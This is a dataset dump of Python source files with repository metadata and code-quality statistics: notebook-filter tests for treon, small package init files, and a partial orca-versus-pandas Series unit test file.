hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a07dd7ab373374ba7517072dc3362027e8347470 | 2,336 | py | Python | tests/test_treon.py | bilke/treon | e43325baa64506dd5570c229091d372931c3b9e2 | [
"MIT"
] | 292 | 2019-04-04T17:46:46.000Z | 2022-02-10T01:39:16.000Z | tests/test_treon.py | bilke/treon | e43325baa64506dd5570c229091d372931c3b9e2 | [
"MIT"
] | 19 | 2019-04-04T11:32:58.000Z | 2021-03-11T03:04:18.000Z | tests/test_treon.py | bilke/treon | e43325baa64506dd5570c229091d372931c3b9e2 | [
"MIT"
] | 26 | 2019-04-07T04:51:00.000Z | 2022-03-16T19:59:53.000Z | import os
from unittest import mock
from treon import treon
def test_filter_results_file():
args = {
"--exclude": ['resources/basic.ipynb',
'failed']
}
results = ['resources/basic.ipynb',
'resources/doctest_failed.ipynb',
'resources/runtime_error.ipynb',
'resources/unittest_failed.ipynb',
'other/resources.ipynb']
filtered = treon.filter_results(results=results, args=args)
expected = ['resources/doctest_failed.ipynb',
'resources/runtime_error.ipynb',
'resources/unittest_failed.ipynb',
'other/resources.ipynb']
assert filtered == expected
def test_filter_results_folder():
args = {"--exclude": ['resources']}
results = ['resources/basic.ipynb',
'resources/doctest_failed.ipynb',
'resources/runtime_error.ipynb',
'resources/unittest_failed.ipynb',
'other/resources.ipynb']
filtered = treon.filter_results(results=results, args=args)
expected = ['other/resources.ipynb']
assert filtered == expected
def test_filter_results_empty():
args = {"--exclude": ['resources']}
results = ['resources/basic.ipynb']
filtered = treon.filter_results(results=results, args=args)
expected = []
assert filtered == expected
def test_filter_results_homedir():
args = {"--exclude": ['~/resources']}
results = [os.path.join(os.path.expanduser("~"), "resources/basic.ipynb")]
filtered = treon.filter_results(results=results, args=args)
expected = []
assert filtered == expected
@mock.patch('os.path.isdir')
def test_filter_results_exclude_is_dir(mock_isdir):
mock_isdir.return_value = True
args = {"--exclude": ["./notebook"]}
results = ["./notebook/1.pynb", "./notebook2/1.pynb"]
filtered = treon.filter_results(results=results, args=args)
expected = ["./notebook2/1.pynb"]
assert filtered == expected
@mock.patch('os.path.isdir')
def test_filter_results_exclude_is_not_dir(mock_isdir):
mock_isdir.return_value = False
args = {"--exclude": ["./notebook"]}
results = ["./notebook1/1.pynb", "./notebook2/1.pynb"]
filtered = treon.filter_results(results=results, args=args)
expected = []
assert filtered == expected
| 32.901408 | 78 | 0.643836 | 249 | 2,336 | 5.863454 | 0.176707 | 0.106849 | 0.053425 | 0.082192 | 0.810959 | 0.810959 | 0.810959 | 0.721233 | 0.721233 | 0.721233 | 0 | 0.004897 | 0.213185 | 2,336 | 70 | 79 | 33.371429 | 0.789445 | 0 | 0 | 0.596491 | 0 | 0 | 0.292808 | 0.19649 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.105263 | false | 0 | 0.052632 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a0babff9e049aa2418dfe7655dc9e5e605903dba | 28 | py | Python | blackdog/osint/IP_Address/Geolocation/__init__.py | Sh-4d0w/blackdog | fefcf6b8b4c6073fa6aaf0bab34ad7e326a1ee79 | [
"Apache-2.0"
] | null | null | null | blackdog/osint/IP_Address/Geolocation/__init__.py | Sh-4d0w/blackdog | fefcf6b8b4c6073fa6aaf0bab34ad7e326a1ee79 | [
"Apache-2.0"
] | null | null | null | blackdog/osint/IP_Address/Geolocation/__init__.py | Sh-4d0w/blackdog | fefcf6b8b4c6073fa6aaf0bab34ad7e326a1ee79 | [
"Apache-2.0"
] | 1 | 2021-07-17T11:17:59.000Z | 2021-07-17T11:17:59.000Z | from .ipverse import Ipverse | 28 | 28 | 0.857143 | 4 | 28 | 6 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107143 | 28 | 1 | 28 | 28 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
26635f00247d7049eda067f30aba4571a0ef90ad | 110 | py | Python | amocrm_api_client/rate_limiter/__init__.py | iqtek/amocrm_api_client | 910ea42482698f5eb47d6b6e12d52ec09af77a3e | [
"MIT"
] | null | null | null | amocrm_api_client/rate_limiter/__init__.py | iqtek/amocrm_api_client | 910ea42482698f5eb47d6b6e12d52ec09af77a3e | [
"MIT"
] | null | null | null | amocrm_api_client/rate_limiter/__init__.py | iqtek/amocrm_api_client | 910ea42482698f5eb47d6b6e12d52ec09af77a3e | [
"MIT"
] | null | null | null | from .core import IRateLimiterDecorator
from .impl import RateLimiterImpl
from .impl import RateLimiterConfig
| 27.5 | 39 | 0.863636 | 12 | 110 | 7.916667 | 0.583333 | 0.168421 | 0.294737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109091 | 110 | 3 | 40 | 36.666667 | 0.969388 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2666b004042ab034098806cd62d9e220d71a6022 | 42 | py | Python | src/oogeso/utils/__init__.py | oogeso/oogeso | 72c05fd02d62b29fc62f60daf4989370fd80cbe1 | [
"MIT"
] | 2 | 2021-05-19T13:16:20.000Z | 2021-11-05T11:47:11.000Z | src/oogeso/utils/__init__.py | oogeso/oogeso | 72c05fd02d62b29fc62f60daf4989370fd80cbe1 | [
"MIT"
] | 71 | 2021-06-01T11:03:56.000Z | 2022-03-01T09:38:37.000Z | src/oogeso/utils/__init__.py | oogeso/oogeso | 72c05fd02d62b29fc62f60daf4989370fd80cbe1 | [
"MIT"
] | null | null | null | from .util import create_time_series_data
| 21 | 41 | 0.880952 | 7 | 42 | 4.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 42 | 1 | 42 | 42 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
266f2f8ea0aaff9f0a5c8e0031d894e786bae945 | 38 | py | Python | cands/__init__.py | andrewk1/correctandsmooth | ecdb4a472d500140428220ca5382f2e4d633743b | [
"MIT"
] | 4 | 2022-01-10T06:31:47.000Z | 2022-03-28T16:31:24.000Z | cands/__init__.py | andrewk1/correctandsmooth | ecdb4a472d500140428220ca5382f2e4d633743b | [
"MIT"
] | null | null | null | cands/__init__.py | andrewk1/correctandsmooth | ecdb4a472d500140428220ca5382f2e4d633743b | [
"MIT"
] | null | null | null | from .cands import correct_and_smooth
| 19 | 37 | 0.868421 | 6 | 38 | 5.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 38 | 1 | 38 | 38 | 0.911765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cd9a29bb0b5cf5d7cb91772f0d0390a46f9c5ef9 | 25 | py | Python | wordsToNumbers/corpus/__init__.py | VoicuTomut/Qountry | 841467eca5704fd24c49000668f739cae8155b59 | [
"MIT"
] | null | null | null | wordsToNumbers/corpus/__init__.py | VoicuTomut/Qountry | 841467eca5704fd24c49000668f739cae8155b59 | [
"MIT"
] | null | null | null | wordsToNumbers/corpus/__init__.py | VoicuTomut/Qountry | 841467eca5704fd24c49000668f739cae8155b59 | [
"MIT"
] | null | null | null |
from .base import Corpus | 12.5 | 24 | 0.8 | 4 | 25 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 2 | 24 | 12.5 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
26a27cebb415623f10017806928c6aa3acde9986 | 64 | py | Python | source/__init__.py | top/media_bridging_py3 | dd5de912c07634a073768d6f0b4a6c78d3f39c98 | [
"MIT"
] | null | null | null | source/__init__.py | top/media_bridging_py3 | dd5de912c07634a073768d6f0b4a6c78d3f39c98 | [
"MIT"
] | null | null | null | source/__init__.py | top/media_bridging_py3 | dd5de912c07634a073768d6f0b4a6c78d3f39c98 | [
"MIT"
] | null | null | null | from source.feed import Feed
from source.twitter import Twitter
| 21.333333 | 34 | 0.84375 | 10 | 64 | 5.4 | 0.5 | 0.37037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 64 | 2 | 35 | 32 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f8055fa5b83e1c50757ece0ebf8ecc180f3f5ff5 | 86 | py | Python | simuvex/simuvex/plugins/cgc.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 86 | 2015-08-06T23:25:07.000Z | 2022-02-17T14:58:22.000Z | simuvex/simuvex/plugins/cgc.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 132 | 2015-09-10T19:06:59.000Z | 2018-10-04T20:36:45.000Z | simuvex/simuvex/plugins/cgc.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 80 | 2015-08-07T10:30:20.000Z | 2020-03-21T14:45:28.000Z | print '... Importing simuvex/plugins/cgc.py ...'
from angr.state_plugins.cgc import *
| 28.666667 | 48 | 0.732558 | 12 | 86 | 5.166667 | 0.833333 | 0.322581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104651 | 86 | 2 | 49 | 43 | 0.805195 | 0 | 0 | 0 | 0 | 0 | 0.465116 | 0.255814 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 1 | null | null | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
f8817a28d516e69879b75c486cd30550fda6b843 | 34 | py | Python | material_mechanics/strength/__init__.py | kemeen/material_mechanics | 00442df2c41a43285708bfdb288348eb3aa50775 | [
"MIT"
] | 4 | 2019-03-06T02:02:21.000Z | 2021-04-18T09:18:50.000Z | material_mechanics/strength/__init__.py | kemeen/material_mechanics | 00442df2c41a43285708bfdb288348eb3aa50775 | [
"MIT"
] | 1 | 2019-01-10T12:00:19.000Z | 2019-01-10T12:00:19.000Z | material_mechanics/strength/__init__.py | kemeen/material_mechanics | 00442df2c41a43285708bfdb288348eb3aa50775 | [
"MIT"
] | 2 | 2020-01-25T01:59:36.000Z | 2022-03-12T03:21:41.000Z | from .puck import PuckStrengthSet
| 17 | 33 | 0.852941 | 4 | 34 | 7.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.966667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f89488f78bc40d623fe5346c82aaa711b129e05d | 129 | py | Python | ramda/drop_repeats.py | jakobkolb/ramda.py | 982b2172f4bb95b9a5b09eff8077362d6f2f0920 | [
"MIT"
] | 56 | 2018-08-06T08:44:58.000Z | 2022-03-17T09:49:03.000Z | ramda/drop_repeats.py | jakobkolb/ramda.py | 982b2172f4bb95b9a5b09eff8077362d6f2f0920 | [
"MIT"
] | 28 | 2019-06-17T11:09:52.000Z | 2022-02-18T16:59:21.000Z | ramda/drop_repeats.py | jakobkolb/ramda.py | 982b2172f4bb95b9a5b09eff8077362d6f2f0920 | [
"MIT"
] | 5 | 2019-09-18T09:24:38.000Z | 2021-07-21T08:40:23.000Z | from ramda.drop_repeats_with import drop_repeats_with
from ramda.equals import equals
drop_repeats = drop_repeats_with(equals)
| 21.5 | 53 | 0.860465 | 20 | 129 | 5.2 | 0.35 | 0.423077 | 0.432692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.100775 | 129 | 5 | 54 | 25.8 | 0.896552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f8a4289af5d407407d3994f181bc7a70ef703782 | 46 | py | Python | ap-python/ap_python/aspenplus/__init__.py | bshaoCN/python-automation | fc02d92ec1870bc39ced8923b905930f4e697e80 | [
"MIT"
] | 1 | 2019-06-28T13:21:39.000Z | 2019-06-28T13:21:39.000Z | ap-python/ap_python/aspenplus/__init__.py | bshaoCN/python-automation | fc02d92ec1870bc39ced8923b905930f4e697e80 | [
"MIT"
] | null | null | null | ap-python/ap_python/aspenplus/__init__.py | bshaoCN/python-automation | fc02d92ec1870bc39ced8923b905930f4e697e80 | [
"MIT"
] | null | null | null | from .application import Application, Version
| 23 | 45 | 0.847826 | 5 | 46 | 7.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108696 | 46 | 1 | 46 | 46 | 0.95122 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f8d247df87c07289831f5dba7a418d8cdcf0dcfd | 60,399 | py | Python | tests/orca_unit_testing/test_series.py | jiajiaxu123/Orca | e86189e70c1d0387816bb98b8047a6232fbda9df | [
"Apache-2.0"
] | 20 | 2019-12-02T11:49:12.000Z | 2021-12-24T19:34:32.000Z | tests/orca_unit_testing/test_series.py | jiajiaxu123/Orca | e86189e70c1d0387816bb98b8047a6232fbda9df | [
"Apache-2.0"
] | null | null | null | tests/orca_unit_testing/test_series.py | jiajiaxu123/Orca | e86189e70c1d0387816bb98b8047a6232fbda9df | [
"Apache-2.0"
] | 5 | 2019-12-02T12:16:22.000Z | 2021-10-22T02:27:47.000Z | import unittest
import orca
import os.path as path
from setup.settings import *
from pandas.util.testing import *
class Csv:
pdf_csv = None
odf_csv = None
class SeriesTest(unittest.TestCase):
def setUp(self):
self.PRECISION = 5
@classmethod
def setUpClass(cls):
# configure data directory
DATA_DIR = path.abspath(path.join(__file__, "../setup/data"))
fileName = 'USPricesSample.csv'
data = os.path.join(DATA_DIR, fileName)
data = data.replace('\\', '/')
# connect to a DolphinDB server
orca.connect(HOST, PORT, "admin", "123456")
Csv.pdf_csv = pd.read_csv(data)
Csv.odf_csv = orca.read_csv(data)
@property
def ps(self):
return pd.Series([1, 2, 3, 4, 5, 6, 7], name='x')
@property
def os(self):
return orca.Series([1, 2, 3, 4, 5, 6, 7], name='x')
@property
def psa(self):
return pd.Series([10, 1, 19, np.nan], index=['a', 'b', 'c', 'd'])
@property
def psb(self):
return pd.Series([-1, np.nan, 1, np.nan], index=['a', 'b', 'd', 'e'])
def test_series_constructor(self):
ps = pd.Series([1, 2, 3, 4, 5, 6, 7], name='x')
os = orca.Series([1, 2, 3, 4, 5, 6, 7], name='x').to_pandas()
assert_series_equal(ps, os)
def test_series_constructor_hasNan(self):
ps = pd.Series([7, np.NaN, 1, np.NaN])
os = orca.Series([7, np.NaN, 1, np.NaN]).to_pandas()
assert_series_equal(ps, os)
def test_series_constructor_hasFloat(self):
ps = pd.Series([7.4, 3.1415826535, np.NaN, -3.4], name='x')
os = orca.Series([7.4, 3.1415826535, np.NaN, -3.4], name='x').to_pandas()
assert_series_equal(ps, os)
def test_series_constructor_with_index(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5]).to_pandas()
assert_series_equal(ps, os)
# def test_series_constructor_from_dict(self):
# d = {'a': [1, 2, 3], 'b': [4, 5, 6]}
# ps = pd.Series(d)
# os = orca.Series(d)
# assert_series_equal(ps, os)
def test_series_constructor_from_scalar(self):
ps = pd.Series(1)
os = orca.Series(1).to_pandas()
assert_series_equal(ps, os)
def test_series_attributes_index(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
assert_index_equal(ps.index, os.index.to_pandas())
ps = pd.Series([7, 2, 1, 4], index=['a', 'b', 'c', 'd'])
os = orca.Series([7, 2, 1, 4], index=['a', 'b', 'c', 'd'])
assert_index_equal(ps.index, os.index.to_pandas())
ps = pd.Series([7, 2, 1, 4], pd.date_range("20190101", periods=4, freq="d"))
os = orca.Series([7, 2, 1, 4], orca.date_range("20190101", periods=4, freq="d"))
assert_index_equal(ps.index, os.index.to_pandas())
def test_series_attributes_array(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
# TODO: pandas.Seires 的array属性返回一个pandas Array,而orca.Series的array属性返回一个list
self.assertEqual(list(ps.array), os.array)
def test_series_attributes_values(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
assert_numpy_array_equal(ps.values, os.values)
ps = pd.Series(['a', 'b', 'c', 'd'])
os = orca.Series(['a', 'b', 'c', 'd'])
assert_numpy_array_equal(ps.values, os.values)
ps = pd.Series(pd.date_range("20190101", periods=10, freq="d"))
# os = orca.Series(pd.date_range("20190101", periods=10, freq="d"))
os = orca.Series(ps)
assert_numpy_array_equal(ps.values, os.values)
def test_series_attributes_dtype(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
self.assertEqual(ps.dtype, os.dtype)
ps = pd.Series(['a', 'b', 'c', 'd'])
os = orca.Series(['a', 'b', 'c', 'd'])
self.assertEqual(ps.dtype, os.dtype)
ps = pd.Series(pd.date_range("20190101", periods=10, freq="d"))
# os = orca.Series(pd.date_range("20190101", periods=10, freq="d"))
os = orca.Series(ps)
self.assertEqual(ps.dtype, os.dtype)
def test_series_attributes_shape(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
self.assertEqual(ps.shape, os.shape)
def test_series_attributes_nbytes(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
def test_series_attributes_ndim(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
self.assertEqual(ps.ndim, os.ndim)
def test_series_attributes_size(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
self.assertEqual(ps.size, os.size)
def test_series_attributes_T(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
assert_series_equal(ps.T, os.T.to_pandas())
def test_series_attributes_hasnans(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
self.assertEqual(ps.hasnans, os.hasnans)
ps = pd.Series([7, 2, 1, np.nan], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, np.nan], index=[3, 1, 5, 5])
self.assertEqual(ps.hasnans, os.hasnans)
def test_series_attributes_dtypes(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
self.assertEqual(ps.dtypes, os.dtypes)
def test_series_attributes_name(self):
ps = pd.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
os = orca.Series([7, 2, 1, 4], index=[3, 1, 5, 5])
ps.name = "S1"
os.name = "S1"
self.assertEqual(ps.name, os.name)
def test_series_binary_operator_function_series_hasnan(self):
ps = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
os = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
# TODO: series_hasNan: fail to initialize a series with np.nan values
# psb = pd.Series([10, 1, 19, np.nan], index=['a', 'b', 'c', 'd'])
# osb = orca.Series([10, 1, 19, np.nan], index=['a', 'b', 'c', 'd'])
# c1 = ps + psb
# c2 = (os + osb).to_pandas()
# assert_series_equal(c1, c2)
# c1 = ps - psb
# c2 = (os - osb).to_pandas()
# assert_series_equal(c1, c2)
# c1 = ps * psb
# c2 = (os * osb).to_pandas()
# assert_series_equal(c1, c2)
# c1 = ps / psb
# c2 = (os / osb).to_pandas()
# assert_series_equal(c1, c2)
# c1 = ps ** psb
# c2 = (os ** osb).to_pandas()
# assert_series_equal(c1, c2)
# c1 = ps // psb
# c2 = (os // osb).to_pandas()
# assert_series_equal(c1, c2)
# c1 = ps % psb
# c2 = (os % osb).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_add_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps + 1
c2 = (os + 1).to_pandas()
assert_series_equal(c1, c2)
# TODO: defalt axis=0: orca.Series.add(1)
